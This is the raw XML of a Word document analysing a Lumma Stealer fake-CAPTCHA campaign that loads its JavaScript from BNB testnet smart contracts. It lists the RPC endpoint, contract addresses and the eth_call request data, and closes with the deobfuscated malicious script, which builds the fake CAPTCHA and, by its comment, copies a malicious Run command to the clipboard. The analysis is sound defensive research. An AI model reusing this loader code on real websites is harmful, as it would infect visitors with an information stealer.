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D0862" w14:textId="5D3C6A03" w:rsidR="00A067C9" w:rsidRDefault="00BA707C">
      <w:r>
        <w:t xml:space="preserve">Analysis of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lumma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Stealer </w:t>
      </w:r>
      <w:r w:rsidR="00F44B58">
        <w:t>infection mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the use of Fake Captcha and utilizing the Ethereum blockchain to push changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F767647" w14:textId="77777777" w:rsidR="00BA707C" w:rsidRDefault="00BA707C"/>
    <w:p w14:paraId="49C123AD" w14:textId="3CB1AA30" w:rsidR="00BA707C" w:rsidRDefault="00BA707C">
      <w:r>
        <w:t>The fake captcha is not used as a targeted attack, but rather it is a kind of a sink hole attack. Fake captcha is being delivered via a Base64 encoded JavaScript hosted on compromised websites. The infected websites are mostly running WordPress, as it is known to be “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>more easy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">” to compromise. The factor that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>play</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> role in here is either an exposed admin page, where users tend to use weak passwords, or the current WordPress installation (or is themes) are vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A84F12" w14:textId="054E39E7" w:rsidR="00BA707C" w:rsidRDefault="00BA707C">
      <w:r w:rsidRPr="00BA707C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="250FF337" wp14:editId="0C03E61C">
            <wp:extent cx="4066788" cy="3570605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1630935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3520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2375" cy="357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52A3" w14:textId="77777777" w:rsidR="00BA707C" w:rsidRDefault="00BA707C"/>
    <w:p w14:paraId="631187C7" w14:textId="5F15FB2E" w:rsidR="00BA707C" w:rsidRDefault="00BA707C">
      <w:r>
        <w:t>The malicious JS is visible on the website with ID “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5036348E" w14:textId="45601A95" w:rsidR="00BA707C" w:rsidRDefault="00BA707C">
      <w:r w:rsidRPr="00BA707C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12E88D2A" wp14:editId="09E2CAFF">
            <wp:extent cx="5943600" cy="4143375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11751771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7717" name="Picture 1" descr="A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4D31" w14:textId="77777777" w:rsidR="00BA707C" w:rsidRDefault="00BA707C"/>
    <w:p w14:paraId="756D82DC" w14:textId="1F476C9C" w:rsidR="00DA0221" w:rsidRDefault="00DA0221">
      <w:r>
        <w:t xml:space="preserve">Once we decode it from Base64 and de-obfuscate it to make it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>readable ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can see the simple check for Windows user agents (as this variant is only infecting Windows devices).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BBBF0B" w14:textId="2C51FA17" w:rsidR="00DA0221" w:rsidRDefault="00DA0221">
      <w:r w:rsidRPr="00DA0221">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FF3FF2C" wp14:editId="1239ED66">
            <wp:extent cx="4067743" cy="771633"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20874888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8885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10F1" w14:textId="77777777" w:rsidR="00D677DC" w:rsidRDefault="00D677DC"/>
    <w:p w14:paraId="69A0CD3F" w14:textId="3ADC8885" w:rsidR="00D677DC" w:rsidRDefault="00D677DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="396E3C5F" wp14:editId="11B49555">
            <wp:extent cx="5943600" cy="6817995"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="27594957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49576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C8C2" w14:textId="40654E82" w:rsidR="00DA0221" w:rsidRDefault="00DA0221">
      <w:r>
        <w:t xml:space="preserve">Looking at the whole JS, we can see an Async function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>loa(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) that will  </w:t>
      </w:r>
      <w:r w:rsidR="00D677DC">
        <w:t>load the response received from “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D677DC" w:rsidRPr="00D677DC">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC">
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC" w:rsidRPr="00D677DC">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D677DC" w:rsidRPr="00D677DC">
        <w:t>://data-seed-prebsc-1-s1</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC" w:rsidRPr="00D677DC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC">
        <w:t>]</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D677DC" w:rsidRPr="00D677DC">
        <w:t>bnbchain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D677DC">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC" w:rsidRPr="00D677DC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC" w:rsidRPr="00D677DC">
        <w:t>org:8545</w:t>
      </w:r>
      <w:r w:rsidR="00D677DC">
        <w:t xml:space="preserve">”. This is where I had to dig a bit more, because I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D677DC">
        <w:t>have  never</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D677DC">
        <w:t xml:space="preserve"> seen this first hand. Great article from where I got the understanding of what it does </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00D677DC" w:rsidRPr="00FD00FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://checkmarx.com/uncategorized/supply-chain-attack-using-ethereum-smart-contracts-to-distribute-multi-platform-malware/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D677DC">
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B3D9F" w14:textId="483D7CD1" w:rsidR="00D677DC" w:rsidRDefault="00D677DC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As per the article, they have observed an attacker using the Ethereum blockchain to push the new C2 address. This was achieved by referencing a “smart contract” address. In our case, the attacker is using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bnbchain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and thus we will look up the contract on their website </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00FD00FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://testnet.bscscan.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1007731E" w14:textId="783D1892" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C">
      <w:r>
        <w:t xml:space="preserve">Looking at the data used for the POST request, we can see that smart contract address </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the “data”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0F022C" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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D5A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9D5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A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D5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A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"0x80d31D935f0EC978253A26D48B5593599B9542C7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009D5A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D5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CD34826" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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D5A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_data</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5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A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D5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0839E71" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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5A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'method'</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5A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9D5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A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D5A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eth_call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5A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D5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4621736" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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5A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'params'</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5A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9D5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[{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72215B5D" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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D5A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'to'</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5A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9D5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A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9D5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4BAFC98" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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D5A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'data'</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5A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9D5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A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"0x6d4ce63c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147905CC" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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}, </w:t>
      </w:r>
      <w:r w:rsidRPr="009D5A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"latest"</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5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01E02DE4" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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5A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9D5A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9D5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A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0x61</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5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04D41F2" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRPr="009D5A9C" w:rsidRDefault="009D5A9C" w:rsidP="009D5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5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5A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D5A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jsonrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D5A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D5A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9D5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5A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"2.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A6299" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C"/>
    <w:p w14:paraId="0CAA0A5D" w14:textId="617D6F39" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C">
      <w:r>
        <w:t>The data values is a known Ethereum signature “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>get(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">)”. Suggesting that this will get the latest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eth_call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2777C86F" w14:textId="49F05B5C" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C">
      <w:r w:rsidRPr="009D5A9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24EDC24C" wp14:editId="4C0781D8">
            <wp:extent cx="5943600" cy="754380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="500799166" name="Picture 1" descr="A white rectangular objec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99166" name="Picture 1" descr="A white rectangular object with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4C5D" w14:textId="77777777" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C"/>
    <w:p w14:paraId="4D0D09F3" w14:textId="5450ADFC" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C">
      <w:r>
        <w:t xml:space="preserve">Accessing the smart contract on </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00FD00FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://testnet.bscscan.com/address/0x80d31D935f0EC978253A26D48B5593599B9542C7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> will show us all Transactions. After opening the latest one, we can show the input data that were part of this transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C2B75" w14:textId="6F73F99F" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C">
      <w:r w:rsidRPr="009D5A9C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F3C2D3D" wp14:editId="75D28CA2">
            <wp:extent cx="6534150" cy="4252085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="165178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839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0308" cy="425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A913" w14:textId="4BF989EB" w:rsidR="009D5A9C" w:rsidRDefault="009D5A9C">
      <w:r>
        <w:t xml:space="preserve">This Method ID is known </w:t>
      </w:r>
      <w:r w:rsidR="00111C53">
        <w:t xml:space="preserve">as “update(string)” </w:t>
      </w:r>
      <w:r w:rsidR="00111C53" w:rsidRPr="00111C53">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2CE98B" wp14:editId="22379260">
            <wp:extent cx="5943600" cy="746125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1213927519" name="Picture 1" descr="A white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27519" name="Picture 1" descr="A white rectangular object with a white bord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A0A8" w14:textId="6E06F353" w:rsidR="00111C53" w:rsidRDefault="00111C53">
      <w:r>
        <w:t>After decoding the data from HEX, we will get yet another long Base64 encoded JS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF6F4B" w14:textId="61421A47" w:rsidR="00111C53" w:rsidRDefault="00111C53">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF6FC38" wp14:editId="09A6172C">
            <wp:extent cx="5943600" cy="851535"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="505626418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26418" name="Picture 1" descr="A close-up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4ABA" w14:textId="282BF546" w:rsidR="00111C53" w:rsidRDefault="00111C53">
      <w:r>
        <w:t xml:space="preserve">The decoded and de-obfuscated </w:t>
      </w:r>
      <w:r w:rsidR="00A259E9">
        <w:t xml:space="preserve">will be used to serve the “Fake captcha”. It will also utilize Smart Contract (this time a different one). This will be used as a check. </w:t>
      </w:r>
      <w:r w:rsidR="00940369">
        <w:t xml:space="preserve">The response from the new smart contract is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00940369">
        <w:t>UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00940369">
        <w:t xml:space="preserve"> cookie, which if set, will disable the Fake Captcha. This seems to be put in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00940369">
        <w:t>place as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00940369">
        <w:t xml:space="preserve"> to verify that the infection was successful. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5394951B" w14:textId="7434495F" w:rsidR="00F44B58" w:rsidRDefault="00F44B58">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from the new Smart contract. If the User ID </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>will be</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the same in the current Cookie, it will disable the Fake Captcha. I assume that this will be true if the device would get infected with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lumma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stealer, but I cannot confirm that as this campaign was discarded during my investigation (after being active for 30 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA0B56" w14:textId="77777777" w:rsidR="00F44B58" w:rsidRDefault="00F44B58"/>
    <w:p w14:paraId="0A71809F" w14:textId="5838D4A6" w:rsidR="00F44B58" w:rsidRDefault="00F44B58">
      <w:r w:rsidRPr="00F44B58">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1742CA82" wp14:editId="1680F773">
            <wp:extent cx="6263034" cy="1867535"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="128801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102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3651" cy="186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FFB7" w14:textId="22775CE5" w:rsidR="001C0779" w:rsidRDefault="001C0779"/>
    <w:p w14:paraId="492579E7" w14:textId="77777777" w:rsidR="00F44B58" w:rsidRDefault="00F44B58"/>
    <w:p w14:paraId="3D25BE9D" w14:textId="77777777" w:rsidR="00940369" w:rsidRDefault="00940369"/>
    <w:p w14:paraId="7F0C16DD" w14:textId="4F30D778" w:rsidR="00940369" w:rsidRDefault="00940369">
      <w:r>
        <w:t xml:space="preserve">Copy of the website in URLSCAN: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00FD00FD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/e49f68be-f760-430f-8127-91d49656c8f5/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DB4A1" w14:textId="77777777" w:rsidR="00940369" w:rsidRDefault="00940369"/>
    <w:p w14:paraId="41C41601" w14:textId="176BDF31" w:rsidR="00940369" w:rsidRDefault="00940369">
      <w:r>
        <w:t xml:space="preserve">At the time of writing, this campaign was disable by the attacker. As he had pushed a new “transaction” which is empty, rendering the whole distribution chain unavailable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>at the moment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436C160" w14:textId="62CAC26D" w:rsidR="00940369" w:rsidRDefault="00940369">
      <w:r w:rsidRPr="00940369">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1791A971" wp14:editId="19EA740E">
            <wp:extent cx="5943600" cy="2003425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5073077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0777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15B6" w14:textId="77777777" w:rsidR="001C0779" w:rsidRDefault="001C0779"/>
    <w:p w14:paraId="1EB1BBB0" w14:textId="3F0506C1" w:rsidR="001C0779" w:rsidRDefault="001C0779">
      <w:r>
        <w:t xml:space="preserve">TLDR: I am lazy to do more and here is the final script, where I at least added comments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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A2FB6E" w14:textId="77777777" w:rsidR="001C0779" w:rsidRDefault="001C0779"/>
    <w:p w14:paraId="3FBE9C85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setCookie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E87694B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0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BDF26F4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1C07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AE64E22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7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5052FB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getTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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864e5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8C3EDA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"; expires="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toUTCString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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353F89A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77509C2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cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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"="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"; path=/"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041AD6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88668E5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getCookie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772FB45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0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cookie</w:t>
      </w:r>
      <w:proofErr w:type="gram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"; "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1E7D5A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07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C0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of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9BBC621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proofErr w:type="gram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"="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ACB110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7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encodeURIComponent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53117AD1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C07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decodeURIComponent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0A1931E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195D505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C19E29A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07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8171A37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9559BE0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generateUUIDv4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449CFCB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07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"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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proofErr w:type="gram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779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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C0779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xy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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1C0779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1C0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EB57C68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7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3727D91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"x"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proofErr w:type="gram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481113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7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proofErr w:type="gram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7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C3C0E0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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB02FA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83E141A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getUserID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095F6C6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0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getCookie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cjs_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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428CEC9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07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proofErr w:type="gram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C91F274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setCookie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cjs_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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generateUUIDv4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1C07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0F022A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8D2DDAD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07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C8EF635" w14:textId="77777777" w:rsid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F69DAA2" w14:textId="5F388F35" w:rsidR="00F44B58" w:rsidRPr="001C0779" w:rsidRDefault="00F44B58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Continuously checking whether Cookie is same as on the smart contract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43885095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isGoalReached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F882B62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0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"0x"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C0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5F544D8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D5EB7B6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7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C0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of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5BA7F29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C0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spellStart"/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proofErr w:type="gram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7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AD0AA7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`0</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0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C0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Start"/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7EA2CD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8386F4F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7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8130590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4CC93350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"0x7d0b5A06F8c43011fB66Eb90f61525A827eaE0d7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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DC26146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"0x24513bb6000000000000000000000000000000000000000000000000000000000000002</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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51A92C6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uuid_hexed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encoder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7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TextEncoder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()).</w:t>
      </w:r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7D6F53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proofErr w:type="spell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7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24A23C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result_len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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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repeat</w:t>
      </w:r>
      <w:proofErr w:type="gram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7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138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uuid_hexed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C077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70C4E4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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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repeat</w:t>
      </w:r>
      <w:proofErr w:type="gram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7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result_len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3E4AA7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07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Code </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C07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bellow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C07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will get the contents of the latest transaction in the contract. This is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C07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UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C07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cookie that will disable the fake </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C07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cpatcha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C07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and will let the user access the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2AAC1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C07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"https://data-seed-prebsc-1-s1.bnbchain.org:8545/"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_config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A1D8FE5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method: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B261F9B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headers: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09747DE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Accept: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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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6ACB8DD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"Content-Type"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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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B3CA603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60B9B5FA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body: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_data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F871F72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method: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eth_call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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DCE3A46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params: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[{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E4B73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to:</w:t>
      </w:r>
      <w:proofErr w:type="gram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C14136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data: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</w:p>
    <w:p w14:paraId="0AEF8492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}, </w:t>
      </w:r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"latest"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21BD8140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97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E142E2B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jsonrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"2.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C111E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0669A284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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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()).</w:t>
      </w:r>
      <w:proofErr w:type="spell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7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8C43AC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7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unhexed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Uint8Array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779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r w:rsidRPr="001C0779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\da-f</w:t>
      </w:r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1C077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{2}</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0779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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C0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gi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90CED49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7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7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F7CE27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}))</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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proofErr w:type="gram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7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7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)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC96B2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7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unhexed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7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7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)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DED20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07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"yes"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7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fromCharCode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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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unhexed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7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7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)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1EC2E3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A274546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"div"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995ADB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"style"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3F67E3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lnk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"link"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8151B2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usr_id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getUserID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C27F886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classList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cjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-container"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cjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-m-p"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7604DE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hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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A5B0D6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</w:t>
      </w:r>
      <w:proofErr w:type="gram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visibility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"hidden"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7DC2B4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</w:t>
      </w:r>
      <w:proofErr w:type="gram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A35FBC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//Code bellow will create the "Fake Captcha"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9CA22A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atob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("PGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL3VzZS5mb250YXdlc29tZS5jb20vcmVsZWFzZXMvdjUuMC4wL2Nzcy9hbGwuY3NzIj4gICAgICAgIAo8ZGl2IGlkPSJjaGVja2JveC13aW5kb3ciIGNsYXNzPSJjaGVja2JveC13aW5kb3cgY2pzLW0tcCBibG9jayI+CiAgICA8ZGl2IGNsYXNzPSJja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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0605EA32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atob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"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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF637D6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cjscss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/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FC8E503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lnk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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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9065683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lnk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proofErr w:type="gram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"https://use.fontawesome.com/releases/v5.0.0/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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/all.css"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31E92A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lnk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proofErr w:type="gram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"text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CA9041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gram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lnk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0CD698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gram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9172E9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gram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F251D9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//Code bellow will add the malicious Windows Run command to your clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323ADFC1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atob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"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"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6B493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//Code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C07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blellow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C07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will check the response from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C07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isGoalReached</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C07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function. If the attack was successful, the container value will be set to "unset" and the user can access the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A2D7D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isGoalReached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usr_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart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15FF632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07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proofErr w:type="gram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974914A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hidden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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F69567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</w:t>
      </w:r>
      <w:proofErr w:type="gram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visibility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"unset"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CE823C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</w:t>
      </w:r>
      <w:proofErr w:type="gram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proofErr w:type="spellEnd"/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"unset"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670E58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atob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"</w:t>
      </w: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69DF194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44989AA" w14:textId="77777777" w:rsidR="001C0779" w:rsidRPr="001C0779" w:rsidRDefault="001C0779" w:rsidP="001C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17CE519A" w14:textId="77777777" w:rsidR="001C0779" w:rsidRDefault="001C0779"/>
    <w:sectPr w:rsidR="001C0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07C"/>
    <w:rsid w:val="00111C53"/>
    <w:rsid w:val="001C0779"/>
    <w:rsid w:val="0042186B"/>
    <w:rsid w:val="00940369"/>
    <w:rsid w:val="009D5A9C"/>
    <w:rsid w:val="00A067C9"/>
    <w:rsid w:val="00A259E9"/>
    <w:rsid w:val="00B572EC"/>
